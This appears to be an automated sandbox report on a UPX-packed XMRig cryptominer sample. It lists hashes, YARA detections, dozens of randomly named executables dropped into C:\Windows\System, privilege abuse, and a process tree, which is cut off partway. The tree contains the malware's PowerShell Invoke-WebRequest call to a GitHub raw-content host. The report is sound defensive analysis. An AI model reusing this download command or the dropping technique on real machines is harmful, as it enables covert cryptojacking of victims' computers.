xmrig | 34aeef6a5dfe995133e891a12366d5e42a7e9f8290230c7f59667b639c0adb16

Analysis

max time kernel
31s
max time network
38s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
29/04/2024, 19:19

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
Size

2.8MB
MD5

086efc5e37cd88708dda41083fff3368
SHA1

967255f2958d1e6a049585e3fc3e40b27db365b4
SHA256

34aeef6a5dfe995133e891a12366d5e42a7e9f8290230c7f59667b639c0adb16
SHA512

c7f950f3144edfc30e9631876e53be1177c33917616a6f13520779b7646278b7bf75b68ac9cd88c62808f2cd7a5f2c0f6dfb18f6bd6a86f219268e725746dd1c
SSDEEP

49152:Lz071uv4BPMkibTIA5sf6r+WVc2HhG82g1Vr5s1PTleLWrJ5HYTCP:NABZ

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 16 IoCs

miner

resource	yara_rule
behavioral2/memory/4244-27-0x00007FF6F42F0000-0x00007FF6F46E2000-memory.dmp	xmrig
behavioral2/memory/4916-144-0x00007FF69BEC0000-0x00007FF69C2B2000-memory.dmp	xmrig
behavioral2/memory/736-164-0x00007FF70E4A0000-0x00007FF70E892000-memory.dmp	xmrig
behavioral2/memory/4112-157-0x00007FF628A40000-0x00007FF628E32000-memory.dmp	xmrig
behavioral2/memory/2296-151-0x00007FF6DEFF0000-0x00007FF6DF3E2000-memory.dmp	xmrig
behavioral2/memory/1928-145-0x00007FF726230000-0x00007FF726622000-memory.dmp	xmrig
behavioral2/memory/2652-135-0x00007FF60AF50000-0x00007FF60B342000-memory.dmp	xmrig
behavioral2/memory/1020-134-0x00007FF745180000-0x00007FF745572000-memory.dmp	xmrig
behavioral2/memory/2340-129-0x00007FF6FC330000-0x00007FF6FC722000-memory.dmp	xmrig
behavioral2/memory/4572-122-0x00007FF7CE5C0000-0x00007FF7CE9B2000-memory.dmp	xmrig
behavioral2/memory/1800-113-0x00007FF7B5A50000-0x00007FF7B5E42000-memory.dmp	xmrig
behavioral2/memory/3104-106-0x00007FF732680000-0x00007FF732A72000-memory.dmp	xmrig
behavioral2/memory/932-99-0x00007FF6CAA50000-0x00007FF6CAE42000-memory.dmp	xmrig
behavioral2/memory/4412-58-0x00007FF67A500000-0x00007FF67A8F2000-memory.dmp	xmrig
behavioral2/memory/1320-31-0x00007FF6530E0000-0x00007FF6534D2000-memory.dmp	xmrig
behavioral2/memory/1764-21-0x00007FF65B580000-0x00007FF65B972000-memory.dmp	xmrig

Executes dropped EXE 64 IoCs

pid	Process
3412	glyrKCQ.exe
4244	zonQroe.exe
1764	skCwxNG.exe
1320	lQcKztp.exe
760	edrfdGF.exe
4412	XluLTgw.exe
932	YjfngVM.exe
3104	IoCQArb.exe
3920	zEpTEjV.exe
1676	sQyDUOA.exe
1800	sHsjOZq.exe
2356	lGLDIXX.exe
4572	ogLGwWr.exe
4916	prQogNG.exe
1928	YsXeohQ.exe
2340	DCpXJiF.exe
1020	zvWKytM.exe
2296	fhjtejm.exe
2652	PfUZXEK.exe
4112	UUQWGWI.exe
736	goTQPyk.exe
3380	gyIoqhn.exe
3940	eBjtJwA.exe
3572	OUCnThU.exe
4512	lyNWLsh.exe
1532	cUbROon.exe
3232	PRqMIaK.exe
2144	gtSQvoh.exe
384	gbpQMIE.exe
1164	hxtqYqa.exe
1876	SqDBlpE.exe
4576	WdLvjCG.exe
1504	dZcWFyK.exe
4304	TsmAJMc.exe
4264	VsEQvUq.exe
4712	AKzPcVI.exe
2824	UwhZSps.exe
628	HgNLVkc.exe
3576	ASnwbkW.exe
4956	LFcsxDj.exe
1904	vrFvhtd.exe
4596	Ofjnawt.exe
2892	cfcQxNh.exe
4332	QemqIQb.exe
4608	JamPCGt.exe
2700	yCWdRHB.exe
1500	dlNMxKv.exe
1340	QAPkerM.exe
2412	InHVohf.exe
3868	mehzWly.exe
3664	PGXefIu.exe
1016	EgyafCw.exe
3792	egqqrow.exe
2328	xjOCTks.exe
4752	GlloeWN.exe
1304	HMUolRA.exe
1716	qVoPArx.exe
508	NgUhyJl.exe
4560	ejeVJZN.exe
4464	ghAPOWO.exe
1984	EAYzEQr.exe
3260	tNARCvz.exe
3048	sQNuTLe.exe
3840	SbFlwXD.exe

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1832-0-0x00007FF786620000-0x00007FF786A12000-memory.dmp	upx
behavioral2/files/0x000b000000023bb6-5.dat	upx
behavioral2/memory/3412-6-0x00007FF783A10000-0x00007FF783E02000-memory.dmp	upx
behavioral2/files/0x000a000000023bba-10.dat	upx
behavioral2/files/0x000a000000023bbb-9.dat	upx
behavioral2/memory/4244-27-0x00007FF6F42F0000-0x00007FF6F46E2000-memory.dmp	upx
behavioral2/files/0x0031000000023bbd-34.dat	upx
behavioral2/files/0x000a000000023bc2-60.dat	upx
behavioral2/files/0x000a000000023bc5-84.dat	upx
behavioral2/files/0x000a000000023bc4-89.dat	upx
behavioral2/files/0x000b000000023bb7-107.dat	upx
behavioral2/files/0x000a000000023bca-127.dat	upx
behavioral2/files/0x000a000000023bcd-136.dat	upx
behavioral2/memory/4916-144-0x00007FF69BEC0000-0x00007FF69C2B2000-memory.dmp	upx
behavioral2/memory/736-164-0x00007FF70E4A0000-0x00007FF70E892000-memory.dmp	upx
behavioral2/files/0x000a000000023bd4-177.dat	upx
behavioral2/files/0x000a000000023bd6-195.dat	upx
behavioral2/files/0x000a000000023bd8-197.dat	upx
behavioral2/files/0x000a000000023bd7-192.dat	upx
behavioral2/files/0x000a000000023bd5-190.dat	upx
behavioral2/files/0x000a000000023bd3-180.dat	upx
behavioral2/files/0x000a000000023bd2-175.dat	upx
behavioral2/files/0x000a000000023bd1-170.dat	upx
behavioral2/files/0x000a000000023bd0-165.dat	upx
behavioral2/files/0x000a000000023bcf-159.dat	upx
behavioral2/memory/4112-157-0x00007FF628A40000-0x00007FF628E32000-memory.dmp	upx
behavioral2/files/0x000a000000023bce-152.dat	upx
behavioral2/memory/2296-151-0x00007FF6DEFF0000-0x00007FF6DF3E2000-memory.dmp	upx
behavioral2/memory/1928-145-0x00007FF726230000-0x00007FF726622000-memory.dmp	upx
behavioral2/files/0x000a000000023bcc-139.dat	upx
behavioral2/memory/2652-135-0x00007FF60AF50000-0x00007FF60B342000-memory.dmp	upx
behavioral2/memory/1020-134-0x00007FF745180000-0x00007FF745572000-memory.dmp	upx
behavioral2/files/0x000a000000023bcb-132.dat	upx
behavioral2/memory/2340-129-0x00007FF6FC330000-0x00007FF6FC722000-memory.dmp	upx
behavioral2/files/0x000b000000023bc0-123.dat	upx
behavioral2/memory/4572-122-0x00007FF7CE5C0000-0x00007FF7CE9B2000-memory.dmp	upx
behavioral2/files/0x000a000000023bc9-117.dat	upx
behavioral2/files/0x000a000000023bc8-116.dat	upx
behavioral2/memory/1800-113-0x00007FF7B5A50000-0x00007FF7B5E42000-memory.dmp	upx
behavioral2/files/0x000a000000023bc7-114.dat	upx
behavioral2/memory/3104-106-0x00007FF732680000-0x00007FF732A72000-memory.dmp	upx
behavioral2/memory/932-99-0x00007FF6CAA50000-0x00007FF6CAE42000-memory.dmp	upx
behavioral2/files/0x000a000000023bc6-92.dat	upx
behavioral2/memory/2356-85-0x00007FF7EA320000-0x00007FF7EA712000-memory.dmp	upx
behavioral2/files/0x000a000000023bc3-82.dat	upx
behavioral2/memory/1676-79-0x00007FF79A0A0000-0x00007FF79A492000-memory.dmp	upx
behavioral2/memory/3920-73-0x00007FF74A950000-0x00007FF74AD42000-memory.dmp	upx
behavioral2/files/0x000b000000023bc1-70.dat	upx
behavioral2/files/0x000a000000023bbf-63.dat	upx
behavioral2/memory/4412-58-0x00007FF67A500000-0x00007FF67A8F2000-memory.dmp	upx
behavioral2/files/0x0031000000023bbe-49.dat	upx
behavioral2/memory/760-47-0x00007FF7547C0000-0x00007FF754BB2000-memory.dmp	upx
behavioral2/memory/1320-31-0x00007FF6530E0000-0x00007FF6534D2000-memory.dmp	upx
behavioral2/files/0x0031000000023bbc-25.dat	upx
behavioral2/memory/1764-21-0x00007FF65B580000-0x00007FF65B972000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

flow	ioc
3	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\AHSPaKS.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\AkbEWqE.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\VorxHFM.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\EPvQgjM.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\FvdtObS.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\fvAcNSG.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\kLmlbOI.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\hGAgycL.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\SduEMdS.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\oYSZOiQ.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\lybSuBi.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\fCJYQHp.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\FYkBqLK.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\BjBMYqL.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\jMpsLPs.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\bbGMXke.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\HFyqigq.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\zaslhaV.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\OgdHxfF.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\gbdHOnn.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\IoUNlCN.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\BvIYnDT.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\EdBTXAR.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\jbUVjvZ.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\GlloeWN.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\wuJMqIk.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\IhPBQdY.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\sRyMlTS.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\tFHHENF.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\quyybzQ.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\pASBkxw.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\IIGzrXP.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\nNYVzBq.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\RWzBgpU.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\MAoRNDB.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\LqyfZEZ.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\sLdkLMC.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\OIPQuRj.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\QklYkGq.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\AdwSxsD.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\CWhAduT.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\eQJZTgZ.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\XUAeaPJ.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\XQAcRBu.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\TETbEvD.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\TjsXZHj.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\Neypjbb.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\vngkODp.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\rykGmcI.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\GYQbzpZ.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\YyfEnyj.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\RTTtQNL.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\rfVsDOh.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\bNqfezt.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\VNehJbj.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\peLJsWJ.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\RBzBnZQ.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\HvsTdEK.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\GKOCFui.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\czGVSMw.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\gwquSYZ.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\wIgOHXA.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\zQCqjKY.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
File created	C:\Windows\System\RkRnuFs.exe	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2592	powershell.exe
2592	powershell.exe
2592	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
Token: SeLockMemoryPrivilege	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
Token: SeDebugPrivilege	2592	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1832 wrote to memory of 2592	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	85
PID 1832 wrote to memory of 2592	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	85
PID 1832 wrote to memory of 3412	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	86
PID 1832 wrote to memory of 3412	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	86
PID 1832 wrote to memory of 4244	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	87
PID 1832 wrote to memory of 4244	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	87
PID 1832 wrote to memory of 1764	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	88
PID 1832 wrote to memory of 1764	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	88
PID 1832 wrote to memory of 1320	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	89
PID 1832 wrote to memory of 1320	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	89
PID 1832 wrote to memory of 760	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	90
PID 1832 wrote to memory of 760	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	90
PID 1832 wrote to memory of 4412	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	91
PID 1832 wrote to memory of 4412	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	91
PID 1832 wrote to memory of 932	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	92
PID 1832 wrote to memory of 932	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	92
PID 1832 wrote to memory of 3104	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	93
PID 1832 wrote to memory of 3104	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	93
PID 1832 wrote to memory of 3920	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	94
PID 1832 wrote to memory of 3920	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	94
PID 1832 wrote to memory of 1676	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	95
PID 1832 wrote to memory of 1676	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	95
PID 1832 wrote to memory of 1800	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	96
PID 1832 wrote to memory of 1800	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	96
PID 1832 wrote to memory of 2356	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	97
PID 1832 wrote to memory of 2356	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	97
PID 1832 wrote to memory of 4572	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	98
PID 1832 wrote to memory of 4572	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	98
PID 1832 wrote to memory of 4916	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	99
PID 1832 wrote to memory of 4916	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	99
PID 1832 wrote to memory of 2296	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	100
PID 1832 wrote to memory of 2296	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	100
PID 1832 wrote to memory of 1928	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	101
PID 1832 wrote to memory of 1928	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	101
PID 1832 wrote to memory of 2340	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	102
PID 1832 wrote to memory of 2340	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	102
PID 1832 wrote to memory of 1020	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	103
PID 1832 wrote to memory of 1020	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	103
PID 1832 wrote to memory of 2652	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	104
PID 1832 wrote to memory of 2652	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	104
PID 1832 wrote to memory of 4112	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	105
PID 1832 wrote to memory of 4112	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	105
PID 1832 wrote to memory of 736	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	106
PID 1832 wrote to memory of 736	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	106
PID 1832 wrote to memory of 3380	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	107
PID 1832 wrote to memory of 3380	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	107
PID 1832 wrote to memory of 3940	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	108
PID 1832 wrote to memory of 3940	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	108
PID 1832 wrote to memory of 3572	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	109
PID 1832 wrote to memory of 3572	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	109
PID 1832 wrote to memory of 4512	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	110
PID 1832 wrote to memory of 4512	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	110
PID 1832 wrote to memory of 1532	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	111
PID 1832 wrote to memory of 1532	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	111
PID 1832 wrote to memory of 3232	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	112
PID 1832 wrote to memory of 3232	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	112
PID 1832 wrote to memory of 2144	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	113
PID 1832 wrote to memory of 2144	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	113
PID 1832 wrote to memory of 384	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	114
PID 1832 wrote to memory of 384	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	114
PID 1832 wrote to memory of 1164	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	115
PID 1832 wrote to memory of 1164	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	115
PID 1832 wrote to memory of 1876	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	116
PID 1832 wrote to memory of 1876	1832	086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe	116

C:\Users\Admin\AppData\Local\Temp\086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\086efc5e37cd88708dda41083fff3368_JaffaCakes118.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2592
- C:\Windows\System\glyrKCQ.exe
  C:\Windows\System\glyrKCQ.exe
  2⤵
  - Executes dropped EXE
  PID:3412
- C:\Windows\System\zonQroe.exe
  C:\Windows\System\zonQroe.exe
  2⤵
  - Executes dropped EXE
  PID:4244
- C:\Windows\System\skCwxNG.exe
  C:\Windows\System\skCwxNG.exe
  2⤵
  - Executes dropped EXE
  PID:1764
- C:\Windows\System\lQcKztp.exe
  C:\Windows\System\lQcKztp.exe
  2⤵
  - Executes dropped EXE
  PID:1320
- C:\Windows\System\edrfdGF.exe
  C:\Windows\System\edrfdGF.exe
  2⤵
  - Executes dropped EXE
  PID:760
- C:\Windows\System\XluLTgw.exe
  C:\Windows\System\XluLTgw.exe
  2⤵
  - Executes dropped EXE
  PID:4412
- C:\Windows\System\YjfngVM.exe
  C:\Windows\System\YjfngVM.exe
  2⤵
  - Executes dropped EXE
  PID:932
- C:\Windows\System\IoCQArb.exe
  C:\Windows\System\IoCQArb.exe
  2⤵
  - Executes dropped EXE
  PID:3104
- C:\Windows\System\zEpTEjV.exe
  C:\Windows\System\zEpTEjV.exe
  2⤵
  - Executes dropped EXE
  PID:3920
- C:\Windows\System\sQyDUOA.exe
  C:\Windows\System\sQyDUOA.exe
  2⤵
  - Executes dropped EXE
  PID:1676
- C:\Windows\System\sHsjOZq.exe
  C:\Windows\System\sHsjOZq.exe
  2⤵
  - Executes dropped EXE
  PID:1800
- C:\Windows\System\lGLDIXX.exe
  C:\Windows\System\lGLDIXX.exe
  2⤵
  - Executes dropped EXE
  PID:2356
- C:\Windows\System\ogLGwWr.exe
  C:\Windows\System\ogLGwWr.exe
  2⤵
  - Executes dropped EXE
  PID:4572
- C:\Windows\System\prQogNG.exe
  C:\Windows\System\prQogNG.exe
  2⤵
  - Executes dropped EXE
  PID:4916
- C:\Windows\System\fhjtejm.exe
  C:\Windows\System\fhjtejm.exe
  2⤵
  - Executes dropped EXE
  PID:2296
- C:\Windows\System\YsXeohQ.exe
  C:\Windows\System\YsXeohQ.exe
  2⤵
  - Executes dropped EXE
  PID:1928
- C:\Windows\System\DCpXJiF.exe
  C:\Windows\System\DCpXJiF.exe
  2⤵
  - Executes dropped EXE
  PID:2340
- C:\Windows\System\zvWKytM.exe
  C:\Windows\System\zvWKytM.exe
  2⤵
  - Executes dropped EXE
  PID:1020
- C:\Windows\System\PfUZXEK.exe
  C:\Windows\System\PfUZXEK.exe
  2⤵
  - Executes dropped EXE
  PID:2652
- C:\Windows\System\UUQWGWI.exe
  C:\Windows\System\UUQWGWI.exe
  2⤵
  - Executes dropped EXE
  PID:4112
- C:\Windows\System\goTQPyk.exe
  C:\Windows\System\goTQPyk.exe
  2⤵
  - Executes dropped EXE
  PID:736
- C:\Windows\System\gyIoqhn.exe
  C:\Windows\System\gyIoqhn.exe
  2⤵
  - Executes dropped EXE
  PID:3380
- C:\Windows\System\eBjtJwA.exe
  C:\Windows\System\eBjtJwA.exe
  2⤵
  - Executes dropped EXE
  PID:3940
- C:\Windows\System\OUCnThU.exe
  C:\Windows\System\OUCnThU.exe
  2⤵
  - Executes dropped EXE
  PID:3572
- C:\Windows\System\lyNWLsh.exe
  C:\Windows\System\lyNWLsh.exe
  2⤵
  - Executes dropped EXE
  PID:4512
- C:\Windows\System\cUbROon.exe
  C:\Windows\System\cUbROon.exe
  2⤵
  - Executes dropped EXE
  PID:1532
- C:\Windows\System\PRqMIaK.exe
  C:\Windows\System\PRqMIaK.exe
  2⤵
  - Executes dropped EXE
  PID:3232
- C:\Windows\System\gtSQvoh.exe
  C:\Windows\System\gtSQvoh.exe
  2⤵
  - Executes dropped EXE
  PID:2144
- C:\Windows\System\gbpQMIE.exe
  C:\Windows\System\gbpQMIE.exe
  2⤵
  - Executes dropped EXE
  PID:384
- C:\Windows\System\hxtqYqa.exe
  C:\Windows\System\hxtqYqa.exe
  2⤵
  - Executes dropped EXE
  PID:1164
- C:\Windows\System\SqDBlpE.exe
  C:\Windows\System\SqDBlpE.exe
  2⤵
  - Executes dropped EXE
  PID:1876
- C:\Windows\System\WdLvjCG.exe
  C:\Windows\System\WdLvjCG.exe
  2⤵
  - Executes dropped EXE
  PID:4576
- C:\Windows\System\dZcWFyK.exe
  C:\Windows\System\dZcWFyK.exe
  2⤵
  - Executes dropped EXE
  PID:1504
- C:\Windows\System\TsmAJMc.exe
  C:\Windows\System\TsmAJMc.exe
  2⤵
  - Executes dropped EXE
  PID:4304
- C:\Windows\System\VsEQvUq.exe
  C:\Windows\System\VsEQvUq.exe
  2⤵
  - Executes dropped EXE
  PID:4264
- C:\Windows\System\AKzPcVI.exe
  C:\Windows\System\AKzPcVI.exe
  2⤵
  - Executes dropped EXE
  PID:4712
- C:\Windows\System\UwhZSps.exe
  C:\Windows\System\UwhZSps.exe
  2⤵
  - Executes dropped EXE
  PID:2824
- C:\Windows\System\HgNLVkc.exe
  C:\Windows\System\HgNLVkc.exe
  2⤵
  - Executes dropped EXE
  PID:628
- C:\Windows\System\ASnwbkW.exe
  C:\Windows\System\ASnwbkW.exe
  2⤵
  - Executes dropped EXE
  PID:3576
- C:\Windows\System\LFcsxDj.exe
  C:\Windows\System\LFcsxDj.exe
  2⤵
  - Executes dropped EXE
  PID:4956
- C:\Windows\System\vrFvhtd.exe
  C:\Windows\System\vrFvhtd.exe
  2⤵
  - Executes dropped EXE
  PID:1904
- C:\Windows\System\Ofjnawt.exe
  C:\Windows\System\Ofjnawt.exe
  2⤵
  - Executes dropped EXE
  PID:4596
- C:\Windows\System\cfcQxNh.exe
  C:\Windows\System\cfcQxNh.exe
  2⤵
  - Executes dropped EXE
  PID:2892
- C:\Windows\System\QemqIQb.exe
  C:\Windows\System\QemqIQb.exe
  2⤵
  - Executes dropped EXE
  PID:4332
- C:\Windows\System\JamPCGt.exe
  C:\Windows\System\JamPCGt.exe
  2⤵
  - Executes dropped EXE
  PID:4608
- C:\Windows\System\yCWdRHB.exe
  C:\Windows\System\yCWdRHB.exe
  2⤵
  - Executes dropped EXE
  PID:2700
- C:\Windows\System\dlNMxKv.exe
  C:\Windows\System\dlNMxKv.exe
  2⤵
  - Executes dropped EXE
  PID:1500
- C:\Windows\System\QAPkerM.exe
  C:\Windows\System\QAPkerM.exe
  2⤵
  - Executes dropped EXE
  PID:1340
- C:\Windows\System\InHVohf.exe
  C:\Windows\System\InHVohf.exe
  2⤵
  - Executes dropped EXE
  PID:2412
- C:\Windows\System\mehzWly.exe
